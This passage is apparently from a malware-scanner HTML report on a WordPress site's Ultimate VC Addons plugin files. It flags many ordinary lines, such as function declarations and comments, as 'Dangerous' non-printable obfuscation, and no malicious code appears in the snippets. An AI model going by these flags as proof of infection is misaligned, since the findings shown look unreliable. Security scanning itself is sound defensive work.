</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_462").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_dual_button.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 66.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 16</span><br><table id="file_463" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$subop</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">ultimate_dual_button</span><span style="color: #007700">() { if ( </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">'name' </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Dual Button' </span><span style="color: #007700">), </span><span style="color: #DD0000">'base' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'ult_dualbutton'</span><span style="color: #007700">, </span><span style="color: #DD0000">'icon' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'uvc_dual_button'</span><span style="color: #007700">, </span><span style="color: #DD0000">'class' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'uvc_dual_button'</span><span style="color: #007700">, </span><span style="color: #DD0000">'category' </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate VC Addons</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Dual Button Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Animation module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function for </span><span style="color: #0000BB">button admin script</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dualbutton_backend_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 415</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 421</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_style' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function for </span><span style="color: #0000BB">enque script</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dualbutton_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 667</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$subop</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 671</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to intialize the button module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 676</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_dual_button</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 677</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 75</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function for </span><span style="color: #0000BB">button module shortcode</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 81</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_dualbtn_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_463").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_buttons.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 36.17 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_464" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">init_buttons</span><span style="color: #007700">() { if ( </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$json </span><span style="color: #007700">= </span><span style="color: #0000BB">ultimate_get_icon_position_json</span><span style="color: #007700">(); </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">'name' </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Advanced Button'</span><span style="color: #007700">, </span><span style="color: #DD0000">'ultimate_vc' </span><span style="color: #007700">), </span><span style="color: #DD0000">'base' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'ult_buttons'</span><span style="color: #007700">, </span><span style="color: #DD0000">'icon' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'ult_buttons'</span><span style="color: #007700">, </span><span style="color: #DD0000">'class' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'ult_but</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Buttons Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Buttons module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to regester style</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">advanced_button_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 353</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 357</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to intialize the button module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 362</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_buttons</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 363</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function for </span><span style="color: #0000BB">button admin script</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">button_admin_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function for </span><span style="color: #0000BB">button module shortcode</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_buttons_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_464").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_hightlight_box.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 25.39 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_465" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Highlight_Box' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_highlight_box </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Highlight_Box</span><span style="color: #007700">(); } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Ctation' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBake</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Highlight Box Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Highlight Box module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Highlight Box Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_cta_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Highlight Box Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ctaction_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Highlight Box Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">call_to_action_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 625</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_465").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_carousel.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 33.36 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 27</span><br><table id="file_466" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate_restore_shortcodes' </span><span style="color: #007700">) ) { function </span><span style="color: #0000BB">ultimate_restore_shortcodes</span><span style="color: #007700">() { global </span><span style="color: #0000BB">$shortcode_tags</span><span style="color: #007700">, </span><span style="color: #0000BB">$_shortcode_tags</span><span style="color: #007700">; if ( isset( </span><span style="color: #0000BB">$_shortcode_tags </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$shortcode_tags </span><span style="color: #007700">= </span><span style="color: #0000BB">$_shortcode_tags</span><span style="color: #007700">; } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Buttons Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Carousel module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">custom_param_styles</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function for </span><span style="color: #0000BB">carousel admin script</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
